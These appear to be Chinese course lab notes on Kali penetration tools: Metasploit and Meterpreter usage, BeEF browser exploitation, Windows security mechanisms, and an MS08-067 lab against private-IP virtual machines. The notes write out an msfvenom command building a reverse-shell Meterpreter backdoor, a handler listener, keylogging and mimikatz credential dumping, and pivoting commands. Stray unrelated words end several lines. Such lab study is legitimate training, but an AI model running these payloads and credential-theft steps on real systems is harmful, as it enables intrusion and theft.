漏洞利用工具集javascript
測試漏洞
armitage
結合MSF進行利用html
專門針對Jboss的漏洞利用工具java
自動化開啓,等待目標訪問中招。linux
評估智能電錶的安全性。算法
Metasploit在滲透測試中常常被用到,實際上這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。他們或許在滲透測試中的每一方面都不能成爲最好用的工具,但組合起來的框架卻讓它變得很強大。sql
Kali漏洞工具集中的重要組成工具,須要先開啓兩個PostgreSQL數據庫服務和metasploit服務,而後就能夠完整的利用msf數據庫查詢exploit和記錄。
shell
service postgresql start service metasploit start
啓動時發現顯示錯誤,上網查找緣由發現是這個版本已經沒有metasploit服務了:數據庫
須要利用如下方法打開帶數據庫支持的MSF服務:windows
etc/init.d/postgresql start 或者 service postgresql start //啓動postgresql數據庫 msfdb init //初始化MSF數據庫 msfconsole db_status //在msf中能夠查看數據庫鏈接狀態
若是不想每次開機都手工啓動服務,配置隨系統啓動api
update-rc.d postgresql enable update-rc.d metasploit enable
msf的路徑cd /usr/share/metasploit-framework/ msfencode -l 未找到命令
Auxiliary: 輔助模塊
encoders: 供msfencode編碼工具使用,具體可使用msfencode -1
exploits:攻擊模塊,每一個介紹msf的文章都會提到那個ms08_067_netapi,它就是這個目錄。
payloads:這裏面列出的是攻擊載荷,也就是攻擊成功後執行的代碼。好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
post:後滲透階段模塊,在得到meterpreter的shell以後可使用的攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。
msfpayload:用來生成payload或者shellcode
搜索時候能夠用msfpayload -l |grep 「windows」這樣的命令來查詢
-o選項能夠列出payload所需的參數
msfencode:msf中的編碼器,早期爲了編碼繞過AV如今經常使用msfpayload與它編碼避免exploit的壞字符串。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell的連接。
msfconsole:
開啓metasploit的console
以SSH用戶名枚舉攻擊對metasploit工具進行測試,利用winxpserver靶機,IP地址爲192.168.92.148,而後經過nmap對靶機所開放的端口服務版本進行探測:
掃描得知,目標21端口vsftpd版本爲5.0,使用msfconsole打開的msf中使用命令search vsftpd
,查看是否存在相應的漏洞利用exploit:
選擇上圖標記出的工具,進行ssh用戶名枚舉,接着利用命令 use使用該工具,選擇exploit,查看參數:
Required顯示yes,表示須要被設置,設置好遠程IP地址:
使用set命令設置參數,說明已經參數已經被設置好。
輸入exploit便可進行攻擊測試,若是成功,將返回一個shell,出現綠色的UID,說明攻擊比較成功。這時能夠查看靶機的IP,cat到一些信息。
Meterpreter是Metasploit框架中的一個拓展模塊,做爲溢出成功後的攻擊載荷使用。攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個Meterpretershell的連接。
Meterpreter做爲後滲透模塊有不少類型,而且命令由核心命令和擴展庫命令組成,極大的豐富了攻擊方式。其有不少的功能,如添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等。
background 將當前會話放置後臺
load/use 加載模塊
interact 切換進一個信道
migrate 遷移進程
run 執行一個已有的模塊
Resource 執行一個已有的rc腳本經常使用的meterpreter類型:
payload windows/meterpreter/reverse_tcp
使用命令:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
發現設置成功後仍沒法顯示,由於新版本的kali下msfpayload已經被移除了。之後只要使用msfvenom就好了,它集成了msfpayload和msfencode的功能:
因此生成meterpreter後門的命令等同爲:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 -i 5 -f exe /root/door.exe
生成成功,將其移入XP系統中:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LPORT 2333
修改監聽端口:
在kali的msf中執行exploit開始監聽:
開啓服務:keyscan_dump 關閉服務:keyscan_stop
抓取本地密碼明文:
發現多了一個mimikatz command:
獲取憑據,輸入命令:wdigest
在跳板機獲取必定權限後,須要積極的向內網主機權限發展,獲取制定的目標信息,探查系統的漏洞,藉助系統的漏洞,藉助Msf已經獲得的meterpreter後門,可使系列的操做更容易。
ifconfig
run autoroute -s 10.0.0.1
這是在Metasploit最經常使用的方法,在添加路由表和session的關係後,即可以使用msf中的模塊跨網段掃描或攻擊。
經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,Sqlmap,Nmap等使用。
background 把session置於後臺 search socks 使用socks開代理 use auxiliary/server/socks4a showoptions exploit
run arp_scanner -r 目標IP地址<br> 內網端口轉發<br> upload lcx.exe c:\ 上傳到C盤根目錄<br>
對XSS漏洞的利用須要一個強大的框架支持,BeeF是瀏覽器攻擊框架的簡稱,是一款專一於瀏覽器端的滲透工具。
直接使用命令 beef-xss便可,打開瀏覽器,會自動跳轉至beef登陸頁面:
默認用戶名:beef 密碼:beef
便可進入主界面:
測試利用:輸入網址http://127.0.0.1:3000/demos/basic.html,能夠進入一個測試頁面:
這樣在主界面左端就能夠看到一個在線主機:
其中。4中顏色分別表示:
該攻擊模塊可用,且隱蔽性強
該攻擊模塊可用,但隱蔽性差
該用戶模塊是否可用還有待驗證
該攻擊模塊不可用
有段表格有該模塊的詳細說明,以及一些可選的參數等。隨意輸入good morning,點擊Excute進行攻擊:
執行後在目標網頁能夠看到以下效果圖:
選中目標主機,點右鍵,在菜單中選中use as proxy,而後在rider選項卡中的forge request 編輯併發送想要發送的內容:
信息發送後,可經過History選項看到,待傳輸成功後,點擊相應的信息,便可顯示詳細的傳輸過程:
BeeF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置:
修改文件config.yaml
打開一個msfconsole
能夠看到Metasploit下面多了不少可使用的模塊。
修改 /usr/share/beef-xss/config.yaml中的Metasploit一行爲true:
保證此處IP等信息設置正確,並修改custom路徑:
配置好後,打開msfconsole,運行命令:
load msgrpc ServerHost=192.168.92.150 Pass=abc123
輸入路徑cd /usr/share/beef-xss/
,執行./beef -x命令
重啓beef發現已經加載了不少Metasploit的攻擊模塊:
一、windows基本結構分爲運行於處理器特權模式的操做系統內核以及運行在處理器非特權模式的用戶,即爲內核態和用戶態。
二、核心機制:進程和線程管理機制、內存管理機制、文件管理機制、註冊表管理機制、網絡管理機制。
三、網絡管理機制:網卡硬件驅動程序(物理層)、NDIS庫以及miniport驅動程序(鏈路層)、TDI傳輸層(網絡協議驅動)(網絡層和傳輸層)、網絡APID以及TDI客戶端(會話層和表示層)、網絡應用程序和服務進程(應用層).
一、監控器模型:主體到客體的訪問都經過監控器做中間,由引用監控器根據安全訪問控制策略來進行受權訪問,全部訪問記錄都由監控器生成審計日誌。
二、核心:SRM安全引用監控(內核中)、LSASS安全服務(用戶態)、winlogon/netlogn、以及Eventlog
三、身份認證機制:安全主體:用戶、用戶組、計算機 身份認證:本地身份認證(winlogon進程、GINA圖形化登陸窗口與LSASS服務)、網絡身份認證(NTLM、Lanman、kerberos)
四、受權與訪問控制機制:對象:文件,目錄,註冊表鍵值,內核對象,同步對象,私有對象,管道,內存,通訊接口。 屬性組成:Owner SID,Group SID,DACL自主訪問控制列表,SACL系統審計訪問控制列表。
五、安全審計機制
六、其餘安全機制:安全中心(防火牆、補丁自動更新、病毒防禦),IPsec加載和驗證機制,EPS加密文件系統,windows文件保護機制,捆綁的IE瀏覽器所提供的隱私保護和瀏覽器安全保護機制。
一、包括遠程口令猜解攻擊、windows網絡服務攻擊,windows客戶端和用戶攻擊。
二、遠程口令猜解攻擊: 遠程口令猜解:SMB協議(tcp44五、tcp139),其餘包括WMI服務、TS遠程桌面終端服務,MY SQL數據庫服務、SharePoint。
3遠程口令猜解的防範:關閉沒必要要的易受攻擊的網絡服務、配置主機防火牆來限制某些端口服務、網絡防火牆限制這些服務的訪問、禁用過期且有安全缺陷的Lanman和NTLM、指定強口令策略。
四、網絡服務遠程滲透攻擊:針對NETBIOS服務的著名漏洞和攻擊、針對SMB服務的著名漏洞和攻擊、針對MSRPC服務的著名漏洞和攻擊、針對windows系統上微軟網絡的遠程滲透攻擊、針對windows系統上第三方服務的遠程滲透攻擊。
5.網絡服務遠程滲透防範措施:最基本的是儘可能避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞。
一、本地提權攻擊:利用操做系統內核、特權用戶啓動程序中安全缺陷與漏洞,緣由是服務器和桌面系統沒有即時進行補丁更新。
二、敏感信息竊取: windows系統口令密文提取技術(拷貝口令密文文件、rdisk工具有份、pwdumpx從SAM文件或者活動目錄中提取口令密文) windows系統口令字破解技術、用戶敏感數據竊取:find、findstr、grep、meterpreter
3.本地敏感信息竊取防範:選擇高強度、高防護的口令,使用更安全的加密明文算法,安全配置策略。
使用Metaspoit攻擊MS08-067,提交正確獲得遠程shell過程的截圖(很多於五張)。
MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。
本次實驗使用的攻擊機是kali,靶機是Win2kServer
攻擊機:192.168.92.147 靶機:192.168.92.148
輸入show payloads會顯示出有效的攻擊載荷,好比shell_reverse_tcp
使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷
輸入show targets會顯示出能夠被攻擊的靶機的操做系統型號
輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147; 輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;